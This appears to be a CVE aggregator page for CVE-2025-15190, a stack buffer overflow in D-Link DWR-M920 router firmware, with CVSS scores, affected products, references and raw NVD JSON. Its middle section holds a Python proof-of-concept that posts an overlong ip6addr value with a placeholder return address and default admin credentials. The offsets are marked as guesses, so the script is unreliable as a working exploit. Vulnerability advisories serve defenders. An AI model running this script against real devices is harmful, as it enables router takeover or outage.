CVE-2025-15190

Description

A security flaw has been discovered in D-Link DWR-M920 up to 1.1.50. Impacted is the function sub_42261C of the file /boafrm/formFilter. The manipulation of the argument ip6addr results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been released to the public and may be exploited.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:dwr-m920_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dwr-m920:-:*:*:*:*:*:*:* - NOT VULNERABLE

D-Link DWR-M920 固件版本 <= 1.1.50

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-15190 PoC - D-Link DWR-M920 Stack Buffer Overflow
# Affected: D-Link DWR-M920 firmware <= 1.1.50
# Location: /boafrm/formFilter sub_42261C function
# Parameter: ip6addr

import requests
import sys

target_ip = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1"
target_port = sys.argv[2] if len(sys.argv) > 2 else "80"

# Construct malicious payload
# Fill the buffer and overwrite return address
# Adjust offset based on actual firmware analysis
buffer_size = 1024  # Estimated buffer size
padding = b"A" * buffer_size

# Overwrite return address with shellcode address or ROP gadget
# In embedded devices, address may be predictable
return_address = b"\x40\x22\x04\x02"  # Example address, adjust per target

# Optional: Add shellcode for command execution
# shellcode = b"\x90" * 100  # NOP sled
# shellcode += b"\xcc" * 50  # Breakpoint for testing

payload = padding + return_address

# IPv6 address with overflow
malicious_ip6addr = "2001:db8::" + payload.decode('latin-1', errors='ignore')

url = f"http://{target_ip}:{target_port}/boafrm/formFilter"

data = {
    "ip6addr": malicious_ip6addr,
    "submit-btn": "submit"
}

headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "Authorization": "Basic " + "YWRtaW46YWRtaW4="  # admin:admin default credentials
}

print(f"[*] Sending exploit to {url}")
print(f"[*] Payload length: {len(payload)}")

try:
    response = requests.post(url, data=data, headers=headers, timeout=10)
    print(f"[+] Request sent. Status code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")

print("[*] Check if shell is obtained or device has crashed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15190
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15190
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15190/
[4] VulDB https://vuldb.com/cve/CVE-2025-15190
[5] https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formFilter.md
[6] https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formFilter.md#poc
[7] https://vuldb.com/?ctiid.338575
[8] https://vuldb.com/?id.338575
[9] https://vuldb.com/?submit.723553
[10] https://www.dlink.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15190", "sourceIdentifier": "[email protected]", "published": "2025-12-29T14:15:55.767", "lastModified": "2025-12-30T20:41:18.593", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in D-Link DWR-M920 up to 1.1.50. Impacted is the function sub_42261C of the file /boafrm/formFilter. The manipulation of the argument ip6addr results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been released to the public and may be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dwr-m920_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.1.50", "matchCriteriaId": "1236073E-31A1-4A4E-81B2-76B6B90BC85D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dwr-m920:-:*:*:*:*:*:*:*", "matchCriteriaId": "E815EF72-10FC-43A4-84A7-A25ABE7A4640"}]}]}], "references": [{"url": "https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formFilter.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formFilter.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338575", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338575", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.723553", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.dlink.com/", "source": "[email protected]", "tags": ["Product"]}]}}